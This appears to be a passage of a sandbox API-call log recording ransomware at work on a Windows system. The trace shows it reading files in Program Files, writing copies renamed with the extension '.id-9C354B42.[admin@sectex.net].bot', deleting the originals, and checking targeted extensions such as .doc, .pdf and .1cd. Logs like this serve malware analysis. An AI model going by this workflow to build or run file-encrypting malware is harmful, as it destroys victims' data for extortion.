	[0139.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.584] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.585] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.585] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0139.660] GetLastError () returned 0x0
	[0139.660] ReadFile (in: hFile=0x398, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xa2b58, lpOverlapped=0x0) returned 1
	[0139.680] WriteFile (in: hFile=0x39c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xa2b60, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xa2b60, lpOverlapped=0x0) returned 1
	[0139.697] ReadFile (in: hFile=0x398, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.697] WriteFile (in: hFile=0x39c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0139.697] SetEndOfFile (hFile=0x39c) returned 1
	[0139.697] CloseHandle (hObject=0x39c) returned 1
	[0139.698] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.698] SetEndOfFile (hFile=0x398) returned 1
	[0139.715] CloseHandle (hObject=0x398) returned 1
	[0139.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.751] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll")) returned 1
	[0139.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.751] lstrlenW (lpString=".doc") returned 4
	[0139.751] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1
	[0139.751] lstrlenW (lpString=".docx") returned 5
	[0139.751] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1
	[0139.751] lstrlenW (lpString=".pdf") returned 4
	[0139.751] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString=".xls") returned 4
	[0139.752] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1
	[0139.752] lstrlenW (lpString=".xlsx") returned 5
	[0139.752] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1
	[0139.752] lstrlenW (lpString=".ppt") returned 4
	[0139.752] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.752] lstrlenW (lpString=".zip") returned 4
	[0139.752] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1
	[0139.752] lstrlenW (lpString=".rar") returned 4
	[0139.752] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString=".bz2") returned 4
	[0139.752] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString=".7z") returned 3
	[0139.752] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1
	[0139.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.752] lstrlenW (lpString=".dbf") returned 4
	[0139.752] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.752] lstrlenW (lpString=".1cd") returned 4
	[0139.752] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.752] lstrlenW (lpString=".jpg") returned 4
	[0139.752] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.752] lstrlenW (lpString=".doc") returned 4
	[0139.752] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1
	[0139.752] lstrlenW (lpString=".docx") returned 5
	[0139.752] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1
	[0139.752] lstrlenW (lpString=".pdf") returned 4
	[0139.752] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1
	[0139.753] lstrlenW (lpString=".xls") returned 4
	[0139.753] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1
	[0139.753] lstrlenW (lpString=".xlsx") returned 5
	[0139.753] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1
	[0139.753] lstrlenW (lpString=".ppt") returned 4
	[0139.753] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1
	[0139.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.753] lstrlenW (lpString=".zip") returned 4
	[0139.753] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1
	[0139.753] lstrlenW (lpString=".rar") returned 4
	[0139.753] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1
	[0139.753] lstrlenW (lpString=".bz2") returned 4
	[0139.753] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1
	[0139.753] lstrlenW (lpString=".7z") returned 3
	[0139.753] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1
	[0139.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.753] lstrlenW (lpString=".dbf") returned 4
	[0139.753] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1
	[0139.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.753] lstrlenW (lpString=".1cd") returned 4
	[0139.753] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1
	[0139.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83
	[0139.753] lstrlenW (lpString=".jpg") returned 4
	[0139.753] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1
	[0139.753] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0139.753] lstrlenW (lpString="EAST_01.MID") returned 11
	[0139.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0139.763] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=6165) returned 1
	[0139.763] CloseHandle (hObject=0x388) returned 1
	[0139.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 0x20
	[0139.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0139.767] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.768] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0139.870] GetLastError () returned 0x0
	[0139.870] ReadFile (in: hFile=0x39c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x1815, lpOverlapped=0x0) returned 1
	[0139.920] WriteFile (in: hFile=0x37c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x1820, lpOverlapped=0x0) returned 1
	[0139.922] ReadFile (in: hFile=0x39c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.922] WriteFile (in: hFile=0x37c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0139.922] SetEndOfFile (hFile=0x37c) returned 1
	[0139.922] CloseHandle (hObject=0x37c) returned 1
	[0139.923] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.923] SetEndOfFile (hFile=0x39c) returned 1
	[0139.928] CloseHandle (hObject=0x39c) returned 1
	[0139.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.929] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 1
	[0139.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.929] lstrlenW (lpString=".doc") returned 4
	[0139.929] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.930] lstrlenW (lpString=".docx") returned 5
	[0139.930] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.930] lstrlenW (lpString=".pdf") returned 4
	[0139.930] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.930] lstrlenW (lpString=".xls") returned 4
	[0139.930] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.930] lstrlenW (lpString=".xlsx") returned 5
	[0139.930] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.930] lstrlenW (lpString=".ppt") returned 4
	[0139.930] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.930] lstrlenW (lpString=".zip") returned 4
	[0139.930] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.930] lstrlenW (lpString=".rar") returned 4
	[0139.930] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.930] lstrlenW (lpString=".bz2") returned 4
	[0139.930] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.930] lstrlenW (lpString=".7z") returned 3
	[0139.930] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.930] lstrlenW (lpString=".dbf") returned 4
	[0139.930] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.930] lstrlenW (lpString=".1cd") returned 4
	[0139.930] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.930] lstrlenW (lpString=".jpg") returned 4
	[0139.930] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.930] lstrlenW (lpString=".doc") returned 4
	[0139.930] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.931] lstrlenW (lpString=".docx") returned 5
	[0139.931] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.931] lstrlenW (lpString=".pdf") returned 4
	[0139.931] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.931] lstrlenW (lpString=".xls") returned 4
	[0139.931] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.931] lstrlenW (lpString=".xlsx") returned 5
	[0139.931] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.931] lstrlenW (lpString=".ppt") returned 4
	[0139.931] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.931] lstrlenW (lpString=".zip") returned 4
	[0139.931] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.931] lstrlenW (lpString=".rar") returned 4
	[0139.931] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.931] lstrlenW (lpString=".bz2") returned 4
	[0139.931] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.931] lstrlenW (lpString=".7z") returned 3
	[0139.931] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.931] lstrlenW (lpString=".dbf") returned 4
	[0139.931] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.931] lstrlenW (lpString=".1cd") returned 4
	[0139.931] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID") returned 62
	[0139.931] lstrlenW (lpString=".jpg") returned 4
	[0139.931] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.931] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0139.931] lstrlenW (lpString="FALL_01.MID") returned 11
	[0139.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0139.941] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=4846) returned 1
	[0139.941] CloseHandle (hObject=0x3a0) returned 1
	[0139.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 0x20
	[0139.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0139.943] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.943] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.943] GetLastError () returned 0x0
	[0139.943] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x12ee, lpOverlapped=0x0) returned 1
	[0139.945] WriteFile (in: hFile=0x398, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x12f0, lpOverlapped=0x0) returned 1
	[0139.946] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.946] WriteFile (in: hFile=0x398, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0139.946] SetEndOfFile (hFile=0x398) returned 1
	[0139.946] CloseHandle (hObject=0x398) returned 1
	[0139.946] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.947] SetEndOfFile (hFile=0x3a0) returned 1
	[0139.970] CloseHandle (hObject=0x3a0) returned 1
	[0139.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.971] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fall_01.mid")) returned 1
	[0139.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.973] lstrlenW (lpString=".doc") returned 4
	[0139.973] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.973] lstrlenW (lpString=".docx") returned 5
	[0139.973] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.973] lstrlenW (lpString=".pdf") returned 4
	[0139.973] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.973] lstrlenW (lpString=".xls") returned 4
	[0139.973] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.973] lstrlenW (lpString=".xlsx") returned 5
	[0139.973] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.973] lstrlenW (lpString=".ppt") returned 4
	[0139.973] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.973] lstrlenW (lpString=".zip") returned 4
	[0139.973] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.973] lstrlenW (lpString=".rar") returned 4
	[0139.973] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.973] lstrlenW (lpString=".bz2") returned 4
	[0139.974] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.974] lstrlenW (lpString=".7z") returned 3
	[0139.974] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.974] lstrlenW (lpString=".dbf") returned 4
	[0139.974] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.974] lstrlenW (lpString=".1cd") returned 4
	[0139.974] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.974] lstrlenW (lpString=".jpg") returned 4
	[0139.974] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.974] lstrlenW (lpString=".doc") returned 4
	[0139.974] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0139.974] lstrlenW (lpString=".docx") returned 5
	[0139.974] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0139.974] lstrlenW (lpString=".pdf") returned 4
	[0139.974] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0139.974] lstrlenW (lpString=".xls") returned 4
	[0139.974] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0139.974] lstrlenW (lpString=".xlsx") returned 5
	[0139.974] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0139.974] lstrlenW (lpString=".ppt") returned 4
	[0139.974] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0139.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.974] lstrlenW (lpString=".zip") returned 4
	[0139.974] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0139.974] lstrlenW (lpString=".rar") returned 4
	[0139.974] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0139.974] lstrlenW (lpString=".bz2") returned 4
	[0139.974] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0139.975] lstrlenW (lpString=".7z") returned 3
	[0139.975] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0139.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.975] lstrlenW (lpString=".dbf") returned 4
	[0139.975] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0139.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.975] lstrlenW (lpString=".1cd") returned 4
	[0139.975] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0139.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 62
	[0139.975] lstrlenW (lpString=".jpg") returned 4
	[0139.975] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0139.975] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0139.975] lstrlenW (lpString="FINCL_02.MID") returned 12
	[0139.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0139.976] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=9318) returned 1
	[0139.976] CloseHandle (hObject=0x3a8) returned 1
	[0139.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 0x20
